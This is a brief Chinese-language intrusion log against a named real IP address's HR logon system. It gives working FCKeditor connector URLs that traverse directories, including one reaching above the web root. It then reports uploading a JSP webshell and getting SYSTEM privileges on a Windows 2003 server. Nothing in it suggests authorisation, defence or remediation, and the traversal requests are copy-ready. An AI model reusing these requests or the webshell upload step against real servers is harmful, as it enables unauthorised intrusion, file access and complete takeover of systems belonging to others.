http://122.225.104.50:8080/templates/index/hrlogon.jsp
扫描目录发现有FCKeditor
http://122.225.104.50:8080/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/
目录可以任意遍历
http://122.225.104.50:8080/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../
本地构造上传文件
上传JSP木马成功
WIN2003系统 直接就是SYSTEM的权限